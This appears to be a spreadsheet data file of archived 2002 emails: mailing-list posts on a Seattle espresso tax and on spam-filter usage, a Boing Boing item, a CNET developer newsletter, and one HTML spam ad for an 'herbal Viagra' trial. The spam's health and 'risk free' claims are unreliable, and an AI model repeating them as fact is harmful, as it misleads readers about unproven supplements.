 expected of espresso drinkers: They want the most expensive thing on
 the menu but resist paying 10 cents to help the needy.
 Some say the tax isn't the issue; they just resent being singled out.
 David Marsh, 45, a costume manager, drinks up to three espressos a
 day, which means he'd be shelling out an extra $109.50 a year. "I, for
 one, don't have kids, but I drink espresso," he said, as he sewed a
 leather collar onto a chain-mail tunic. "I don't mind paying, but I
 think everyone should pay."
 Coffeehouses are steamed about it, and they've organized as
 JOLT--Joined to Oppose the Latte Tax. Among the members are Seattle's
 Chamber of Commerce and the city's two largest coffee franchises,
 Starbucks and Tully's.
 The tax would force coffeehouses to track sales of any beverage that
 contains espresso, a task that could be an administrative nightmare
 for smaller cafes, especially during the frantic morning rush. If
 espresso counts come under suspicion, coffeehouse owners could face a
 city audit.
 University of Chicago economics professor Michael Greenstone said the tax doesn't add up. 
 "The purpose of any tax is to be efficient and equitable, and this is
 neither," he said. "On the efficiency side, it's surely going to lead
 to costly efforts by both businesses and consumers to find ways to
 avoid the tax. For example, Starbucks could claim that they are using
 finely ground coffee, [instead of coffee run though an espresso maker]
 and that consequently, they are exempt from the tax. Would they be
 right? I don't know, but finding out will surely take lots of legal
 fees that could have gone to child care.
 "Of course, from a public-relations perspective, this is an ingenious
 idea, and I mean that in a cynical way. They've pitted espresso
 drinkers against child-care supporters, and who's going to side with
 the espresso drinkers?"
 In fact, the proposed tax has forced opponents into a political
 two-step, where their criticism must remain a beat behind their public
 stance of political correctness. In a liberal city like Seattle,
 corporations continually advertise their commitment to social
 activism, and throughout the debate over the initiative, JOLT members
 prefaced their opposition with endorsements of good child care.
 "Starbucks will continue to support early-learning and
 childhood-development programs through the millions of dollars we
 contribute annually," the company said. "However, Starbucks does not
 understand why the Economic Opportunity Institute would recommend an
 additional consumer tax on espresso beverages, or any other single
 consumer product."
 The City Council has yet to decide when the initiative will go before
 voters next year. The initiative's authors say it is directed at
 vendors; critics predict it will be passed on to consumers through
 higher prices, effectively punishing them for their choice of coffee.
 The tax would be applied to any drink with at least half an ounce of
 espresso, including decaf. Drip coffee would be exempt.
 Burbank says the tax would reach only a pre-selected group of
 consumers who are wealthier than those who drink drip. So, he's been
 pitching it as a modern-day Robin Hood tax, where the needy get a dime
 every time the affluent spend $3 to $4 on an espresso.
 It's the kind of political marketing that Fran Beulah, 43, finds
 funny. "I drink espresso," she said, laughing, "and I am not rich."
 JH&gt; "I did not have sex with that woman."
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 JH&gt; Mr.
 &gt;&gt; FoRK
 &gt;&gt; Sent: Monday, September 23, 2002 2:12 PM
 &gt;&gt; To: FoRK
 &gt;&gt; Subject: Re: Goodbye Global Warming
 &gt;&gt; 
 &gt;&gt; 
 &gt;&gt; ----- Original Message -----
 &gt;&gt; From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt;&gt; 
 &gt;&gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt;&gt; &gt; would have had to invent it.
 &gt;&gt; A Republican once said "I am not a crook".
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial....            OV
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF"  size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/index.asp?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and Women - Your's Risk=
  Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The all natural s=
 afe formula for men and women your's risk free for 30 days. Mother Nature'=
 s wonder pill of the 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;&lt;body bgcolor=3D"#FFFFFF"&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart from further contac=
 ts
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/service.html"&gt;visit here&lt;/a=
 &gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 jmd
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 5 Aug 2002, Ray Gardener wrote:
 &gt; setup the config of pine to 
 &gt; enable the enable-unix-pipe-cmd 
 &gt; 
 &gt; then when reading the message
 &gt; 
 &gt; enter 
 &gt; 
 &gt; |  razor-check 
 You should also enable raw mode (ctrl-w) and delimiters (ctrl-r) before 
 directing messages to the pipe. Raw mode includes the headers and 
 delimiters allow several messages to be submitted.
 -- 
 Mika Hirvonen &lt;hirvox@welho.com&gt;
   http://nightwatch.mine.nu/
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">At 8:16 AM -0700 on 9/9/02, Gordon Mohr wrote:
 &lt;Calculations elided...&gt;
 &gt; Of course this says very little, almost nothing, about the overall
 &gt; population behavior, gay or straight, and the relative prevalence
 &gt; of 3K+ individuals in either group. But it does strongly suggest
 &gt; that gay males with 3K+ partners exist in measurable numbers, so
 &gt; people should stop treating Eugen's anecdotal estimation as if it
 &gt; were sheer fantasy. BitBitch's own citation suggests otherwise.
 That math stuff's, a, um, bitch, i'nit?
 ;-)
 Cheers,
 RAH
 [Who could care less who boinks whom, or for how much, though watching the
 Righteous Anger(tm) around here this morning *has* been amusing...]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</si>
  <si>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Cellular doom
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524823
 Date: Not supplied
 Doom has been ported to the Nokia 7650 handset! Link[1] Discuss[2] (_via Ben 
 Hammersley.com[3]_)
 [1] http://www.wildpalm.co.uk/Doom7650.html
 [2] http://www.quicktopic.com/boing/H/RnFavNUGmidx
 [3] http://www.benhammersley.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch: Tools for Software Developers&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4616.200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60 alt="Download Dispatch - Tools
 for Software Developers"
 src="http://download.cnet.com/i/dl/scr/442_downldHDR_softwr.gif"
 width=442&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_b.gif"
 width=160 height=18&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img
 src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120
 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ad --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- ad --&gt;
 &lt;/A&gt;&lt;BR&gt;&amp;nbsp;&lt;BR&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- featured collections --&gt;
 &lt;IMG height=20 src="http://a.r.tv.com/cnet.1d/i/nl/shw/rhc_featcol.gif"
 width=150&gt;&lt;BR&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqe_pq4uAE64qDAwrPGFR" &gt;ActiveX controls
 &lt;BR&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 We've selected our top programs that handle transparent GIF
    files, offer prebuilt ActiveX controls, and edit hex code
    to get you up and running.
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;!-- end featured collections --&gt;
 &lt;!-- &lt;P&gt;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDxti4JMKE-nFr99H29R" &gt;&lt;IMG height=40
 src="http://catchup.cnet.com/catchup_btn2.gif" width=160 border=0&gt;&lt;/a&gt;
 &lt;P&gt; --&gt;
 	&lt;!-- updates &amp; drivers --&gt;
 	&lt;IMG height=20 alt="Software Updates"
 src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3D_ulv-GZP85eXsJh-uR" &gt;Anfy Java 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Apply magical effects to your Web-bound images.
 &lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeOtgWz0pvVdi5Z7edsR" &gt;ActiveFile 2.3
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Add file-handling capabilities to your Active Server Pages.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9ThuuLDiqzUbrvLkiDZR" &gt;UltraEdit-32 9.1&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Edit text, HTML, or hex code, with a comprehensive support for a programmer's needs.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43mOSOr2n9kgGa2oXqGdR" &gt;SQL*Lite 2.6&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Run up to five simultaneous SQL queries with this tool for Oracle and MySQL.&lt;P&gt;
 	&lt;!-- end updates &amp; drivers --&gt;
 &lt;!-- shopper upgrades --&gt;
 &lt;IMG height=20 alt="Software
 Upgrades"src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif"
 width=150&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD colSpan=2&gt;&lt;FONT face="Arial, Helvetica, sans-serif"
 size=2&gt;&lt;B&gt;Software Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
  				 &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD0pMqVnyLxjkqVAXXbcR" &gt;
 				 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNEbj9Ca1cN0535V0YiR" &gt;
 				 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPbl7b5LQ53xlZk0f-IonR" &gt;
 				 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHFszRxqwuBXvl3NU2rR" &gt;
 				 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonn1kpdmSjaeTldfVpfRR" &gt;
 				 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				                  &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2pCEzLu0dAVJ9PZAKTFR" &gt;
 				 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                    &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 	                     &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-Surf_fdxQMKtNX8PQ9R" &gt;
 				 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 		                  &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-dK3Y0zSROUJEymxquR" &gt;
 				 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_nGS5s2bjsMVKpv3DxsR" &gt;
 				 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvF_F_BDqBxDVAmoBamZR" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;p&gt;
 &lt;TR&gt;
 &lt;p&gt;&lt;TD colSpan=2&gt;
 &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;Find a complete
 list of the 50 most popular software products at &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQ6Wpd-98BbBL7kOi_dR" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;p&gt;
 &lt;!--  end shopper upgrades --&gt;
 	&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#ffffef border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD rowSpan=2 width=10&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=10&gt;&lt;/TD&gt;
 &lt;TD colSpan=3&gt;
 &lt;!-- date --&gt;
 &lt;FONT face="arial, helvetica"
 size=-2&gt;July 10, 2002 &lt;/FONT&gt;
 &lt;!-- /date --&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;B&gt;Greetings from Download.com!&lt;/B&gt;&lt;/FONT&gt;&lt;p&gt;
 If you're developing Windows applications in an
 ActiveX-compatible environment (which includes most major ones
 such as Visual Basic and C++), it's time you started taking
 advantage of prefab programming components. An amazing array of
 controls are out there, with more arriving at Download.com
 every day. This week, we've collected the top programs that
 handle transparent GIF files, offer prebuilt ActiveX controls,
 and edit hex code to get you up and running.&lt;p&gt;
 Also this week, we've got two really useful ActiveX entries:
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wJ46AOd5q0_HZB17WsR" &gt;FileSystem 1.2&lt;/a&gt; and &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaETrfOP26D_8gaZjMZR" &gt;AppSecureX 2.9&lt;/a&gt;. FileSystem gives you access
 to drives, folders, and I/O operations; and AppSecureX adds
 serial number and shareware-type functionality to your
 applications.&lt;p&gt;
 Becky Waring&lt;br&gt;
 Contributing Editor, CNET Download.com&lt;p&gt;
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/TD&gt;&lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 	&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=430&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!--  reviews and features --&gt;
 &lt;TABLE border="0" cellPadding=10 cellSpacing=0 width=430&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;IMG alt="Reviews &amp;amp; Features"
 src="http://www.cnet.com/i/nl/lx/sub_rev.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410 border=0&gt;&lt;BR&gt;
 &lt;font size=-2&gt;From Builder.com&lt;/font&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;A name=h1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMDex7vEMLKlXBDgnVnR" &gt;Six
 MySQL/PHP functions to streamline development&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 Code reuse is one of the keys to increasing developer
      productivity. This article looks at several handy functions
      you can use to save time when building applications using
      PHP and MySQL.
 &lt;br /&gt;&lt;br /&gt;
 &lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMrDgN1lpW-B_KMqztrR" &gt;Faking
 SOAP principles with familiar techniques&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 SOAP is everywhere you turn. But what exactly is it? Take
      this guided tour to gain working knowledge of this emerging
      standard.
 &lt;p /&gt;
 &lt;/font&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- End reviews and features --&gt;
 &lt;!-- picks of the week --&gt;
 &lt;IMG alt="Picks of the week"
 src="http://www.cnet.com/i/nl/dl/sub_picks.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;FONT size=-2&gt;in ActiveX&lt;/FONT&gt;&lt;BR&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bRJmGcQA5K-fxuEL5iR" &gt;FileSystem 1.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Having problems wrangling the Windows File System? The
    FileSystem ActiveX control offers complete access to common
    file information under Windows through three independent
    interfaces. Everything from drive and folder access to file
    I/O operations is available with only a few lines of code.
    Use this control's interfaces to detect media types and
    media insertion, get complete lists of folders and files at
    unlimited folder depth, find out what attributes are set on
    files, and even load logbook files into collections
    automatically. Rope in your files.&lt;P&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFkYQzCtuoAABMMPZ9FR" &gt;ApSecureX 2.9&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Prevent pirates from copying your software with AppSecureX.
    This control provides a registration system that produces a
    valid serial number customized to the user's machine. When
    the user installs your software, a unique ID number is
    generated for that system. To get the serial number, the
    user must provide you with his installation number. The
    data file created by the application is encrypted
    differently for each system, so even if someone were to
    crack the file, they couldn't use the information on
    another machine. AppSecure can also give your software
    shareware functionality such as number of days left, checking
    to see if the system clock is set back, and so on. AppSecureX
    works with any ActiveX-enabled programming language such as
    Microsoft Visual Basic or Microsoft Visual C++. A demo
    application is included. Lock up your software.&lt;P&gt;
 &lt;FONT size=-2&gt;in Java&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabm_zRddCW5CH7esbKR9R" &gt;AppletFile 2.5&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 AppletFile is a set of Java applets that will enhance your
    Web site's file upload and download capabilities. In
    addition to support for SSL, proxy, and authenticated
    uploading, users can upload and download multiple files
    using predefined paths to automate the process as much as
    possible. A scripting language provides for sophisticated
    customization, and the user interface includes support for
    12 different languages. Transfers are faster because the
    applet uses its own compression (AutoZIP). The AutoSYNC
    feature downloads only updated files, and verification of
    file transfer integrity is made possible with built-in
    support for MD5 message digests. AppletFile is based on
    HTTP protocols and is firewall-friendly. This update adds
    Sun's Java Plug-in support for Netscape 6+ browsers and
    shows removable media drives in the browse dialog. Beam up
    your files.&lt;P&gt;
 &lt;FONT size=-2&gt;in Tools &amp;amp; Editors&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45ync3FQhaIHsSzky0uR" &gt;PHP Master Editor 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Write, edit, and debug PHP scripts and HTML pages with this
    tool. PHP Master Editor includes an internal browser for
    viewing, as well as a debugger for local testing. Basic FTP
    capability is also included. Specifically designed for PHP
    programmers, the program recognizes and formats functions,
    variables, and classes within the code, and features
    customizable code templates. Get code-happy.
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- top ten --&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif"
 width=410&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;Most
 Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending July 7
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
